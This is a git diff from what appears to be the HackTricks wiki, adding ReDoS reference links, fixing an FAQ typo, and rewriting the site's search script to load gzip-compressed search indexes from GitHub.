[https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) +- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) - [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869) +- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) β€” [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618) +- Why RE2 (linear‑time regex engine) β€” [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index dd6a54063..8c4e6faf8 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I a page of HackTricks?** +> - **How can I reference a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: diff --git a/theme/ht_searcher.js b/theme/ht_searcher.js index 6b105f263..9548e9173 100644 --- a/theme/ht_searcher.js +++ b/theme/ht_searcher.js @@ -6,34 +6,63 @@ */ (() => { - "use strict"; + "use strict"; + + /* ───────────── 0. helpers (main thread) ───────────── */ + const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; + + /* ───────────── 1. Web‑Worker code ─────────────────── */ + const workerCode = ` + self.window = self; + self.search = self.search || {}; + const abs = p => location.origin + p; + + /* 1 β€” elasticlunr */ + try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } + catch { importScripts(abs('/elasticlunr.min.js')); } + + /* 2 β€” decompress gzip data */ + async function decompressGzip(arrayBuffer){ + if(typeof DecompressionStream !== 'undefined'){ + /* Modern browsers: use native DecompressionStream */ + const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip')); + const decompressed = await new Response(stream).arrayBuffer(); + return new TextDecoder().decode(decompressed); + } else { + /* Fallback: use pako library */ + if(typeof pako === 'undefined'){ + try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); } + catch(e){ throw new Error('pako library required for decompression: '+e); } + } + const uint8Array = new Uint8Array(arrayBuffer); + const decompressed = pako.ungzip(uint8Array, {to: 'string'}); + return decompressed; + } + } - /* ───────────── 0. helpers (main thread) ───────────── */ - const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; - - /* ───────────── 1. Web‑Worker code ─────────────────── */ - const workerCode = ` - self.window = self; - self.search = self.search || {}; - const abs = p => location.origin + p; - - /* 1 β€” elasticlunr */ - try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } - catch { importScripts(abs('/elasticlunr.min.js')); } - - /* 2 β€” load a single index (remote β†’ local) */ + /* 3 β€” load a single index (remote β†’ local) */ async function loadIndex(remote, local, isCloud=false){ let rawLoaded = false; if(remote){ + /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */ try { const r = await fetch(remote,{mode:'cors'}); - if (!r.ok) throw new Error('HTTP '+r.status); - importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'}))); - rawLoaded = true; - } catch(e){ console.warn('remote',remote,'failed β†’',e); } + if (r.ok) { + const compressed = await r.arrayBuffer(); + const text = await decompressGzip(compressed); + importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'}))); + rawLoaded = true; + console.log('Loaded compressed from GitHub:',remote); + } + } catch(e){ console.warn('compressed GitHub',remote,'failed β†’',e); } } + /* If remote (GitHub) failed, fall back to local uncompressed file */ if(!rawLoaded && local){ - try { importScripts(abs(local)); rawLoaded = true; } + try { + importScripts(abs(local)); + rawLoaded = true; + console.log('Loaded local fallback:',local); + } catch(e){ console.error('local',local,'failed β†’',e); } } if(!rawLoaded) return null; /* give up on this index */ @@ -61,151 +90,159 @@ return local ? loadIndex(null, local, isCloud) : null; } + + let built = []; + const MAX = 30, opts = {bool:'AND', expand:true}; + + self.onmessage = async ({data}) => { + if(data.type === 'init'){ + const lang = data.lang || 'en'; + const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master'; - (async () => { - const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); - const lang = htmlLang.split('-')[0]; - const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download'; - const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download'; + /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */ + const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz'])); + const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz'])); - const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master'])); - const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master'])); + const MAIN_REMOTE_SOURCES = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); + const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); - const MAIN_REMOTE_SOURCES = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`); - const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`); - - const indices = []; - const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js', false); if(main) indices.push(main); - const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js', true ); if(cloud) indices.push(cloud); - - if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } - - /* build index objects */ - const built = indices.map(d => ({ - idx : elasticlunr.Index.load(d.json), - urls: d.urls, - cloud: d.cloud, - base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' - })); - - postMessage({ready:true}); - const MAX = 30, opts = {bool:'AND', expand:true}; - - self.onmessage = ({data:q}) => { - if(!q){ postMessage([]); return; } - - const all = []; - for(const s of built){ - const res = s.idx.search(q,opts); - if(!res.length) continue; - const max = res[0].score || 1; - res.forEach(r => { - const doc = s.idx.documentStore.getDoc(r.ref); - all.push({ - norm : r.score / max, - title: doc.title, - body : doc.body, - breadcrumbs: doc.breadcrumbs, - url : s.base + s.urls[r.ref], - cloud: s.cloud + const indices = []; + const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js', false); if(main) indices.push(main); + const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js', true ); if(cloud) indices.push(cloud); + if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } + + /* build index objects */ + built = indices.map(d => ({ + idx : elasticlunr.Index.load(d.json), + urls: d.urls, + cloud: d.cloud, + base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' + })); + + postMessage({ready:true}); + return; + } + + const q = data.query || data; + if(!q){ postMessage([]); return; } + + const all = []; + for(const s of built){ + const res = s.idx.search(q,opts); + if(!res.length) continue; + const max = res[0].score || 1; + res.forEach(r => { + const doc = s.idx.documentStore.getDoc(r.ref); + all.push({ + norm : r.score / max, + title: doc.title, + body : doc.body, + breadcrumbs: doc.breadcrumbs, + url : s.base + s.urls[r.ref], + cloud: s.cloud + }); }); - }); - } - all.sort((a,b)=>b.norm-a.norm); - postMessage(all.slice(0,MAX)); - }; - })(); - `; + } + all.sort((a,b)=>b.norm-a.norm); + postMessage(all.slice(0,MAX)); + }; + `; + + /* ───────────── 2. spawn worker ───────────── */ + const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); + + /* ───────────── 2.1. initialize worker with language ───────────── */ + const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); + const lang = htmlLang.split('-')[0]; + worker.postMessage({type: 'init', lang: lang}); + + /* ───────────── 3. DOM refs ─────────────── */ + const wrap = document.getElementById('search-wrapper'); + const bar = document.getElementById('searchbar'); + const list = document.getElementById('searchresults'); + const listOut = document.getElementById('searchresults-outer'); + const header = document.getElementById('searchresults-header'); + const icon = document.getElementById('search-toggle'); + + const READY_ICON = icon.innerHTML; + icon.textContent = '⏳'; + icon.setAttribute('aria-label','Loading search …'); + icon.setAttribute('title','Search is loading, please wait...'); - /* ───────────── 2. spawn worker ───────────── */ - const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); - - /* ───────────── 3. DOM refs ─────────────── */ - const wrap = document.getElementById('search-wrapper'); - const bar = document.getElementById('searchbar'); - const list = document.getElementById('searchresults'); - const listOut = document.getElementById('searchresults-outer'); - const header = document.getElementById('searchresults-header'); - const icon = document.getElementById('search-toggle'); - - const READY_ICON = icon.innerHTML; - icon.textContent = '⏳'; - icon.setAttribute('aria-label','Loading search …'); - icon.setAttribute('title','Search is loading, please wait...'); - - const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; - let debounce, teaserCount=0; - - /* ───────────── helpers (teaser, metric) ───────────── */ - const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); - const URL_MARK='highlight'; - function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} - - function makeTeaser(body,terms){ - const stem=w=>elasticlunr.stemmer(w.toLowerCase()); - const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; - const W=[],sents=body.toLowerCase().split('. '); - let i=0,v=W_F,found=false; - sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); - if(!W.length) return body; - const win=Math.min(W.length,WIN); - const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; - for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; - const best=found?sums.lastIndexOf(Math.max(...sums)):0; - const out=[]; i=W[best][2]; - for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;} - return out.join(''); - } - - function format(d,terms){ - const teaser=makeTeaser(escapeHTML(d.body),terms); - teaserCount++; - const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); - const parts=d.url.split('#'); if(parts.length===1) parts.push(''); - const abs=d.url.startsWith('http'); - const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; - const style=d.cloud?" style=\"color:#1e88e5\"":""; - const isCloud=d.cloud?" [Cloud]":" [Book]"; - return ``+ - `${d.breadcrumbs}${isCloud}${teaser}`; - } - - /* ───────────── UI control ───────────── */ - function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} - function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} - - icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); - - document.addEventListener('keydown',e=>{ - if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; - const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); - if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} - else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} - else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} - }); - - bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); }); - - /* ───────────── worker messages ───────────── */ - worker.onmessage = ({data}) => { - if(data && data.ready!==undefined){ - if(data.ready){ - icon.innerHTML=READY_ICON; - icon.setAttribute('aria-label','Open search (S)'); - icon.removeAttribute('title'); - } - else { - icon.textContent='❌'; - icon.setAttribute('aria-label','Search unavailable'); - icon.setAttribute('title','Search is unavailable'); - } - return; + + const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; + let debounce, teaserCount=0; + + /* ───────────── helpers (teaser, metric) ───────────── */ + const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); + const URL_MARK='highlight'; + function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} + + function makeTeaser(body,terms){ + const stem=w=>elasticlunr.stemmer(w.toLowerCase()); + const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; + const W=[],sents=body.toLowerCase().split('. '); + let i=0,v=W_F,found=false; + sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); + if(!W.length) return body; + const win=Math.min(W.length,WIN); + const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; + for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; + const best=found?sums.lastIndexOf(Math.max(...sums)):0; + const out=[]; i=W[best][2]; + for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;} + return out.join(''); } - const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); - header.textContent=metric(docs.length,q); - clear(list); - docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); - listOut.classList.toggle('hidden',!docs.length); - }; -})(); - + + function format(d,terms){ + const teaser=makeTeaser(escapeHTML(d.body),terms); + teaserCount++; + const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); + const parts=d.url.split('#'); if(parts.length===1) parts.push(''); + const abs=d.url.startsWith('http'); + const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; + const style=d.cloud?" style=\"color:#1e88e5\"":""; + const isCloud=d.cloud?" [Cloud]":" [Book]"; + return ``+ + `${d.breadcrumbs}${isCloud}${teaser}`; + } + + /* ───────────── UI control ───────────── */ + function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} + function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} + + icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); + + document.addEventListener('keydown',e=>{ + if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; + const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); + if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} + else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} + else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} + }); + + bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); }); + + /* ───────────── worker messages ───────────── */ + worker.onmessage = ({data}) => { + if(data && data.ready!==undefined){ + if(data.ready){ + icon.innerHTML=READY_ICON; + icon.setAttribute('aria-label','Open search (S)'); + icon.removeAttribute('title'); + } + else { + icon.textContent='❌'; + icon.setAttribute('aria-label','Search unavailable'); + icon.setAttribute('title','Search is unavailable'); + } + return; + } + const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); + header.textContent=metric(docs.length,q); + clear(list); + docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); + listOut.classList.toggle('hidden',!docs.length); + }; + })(); + \ No newline at end of file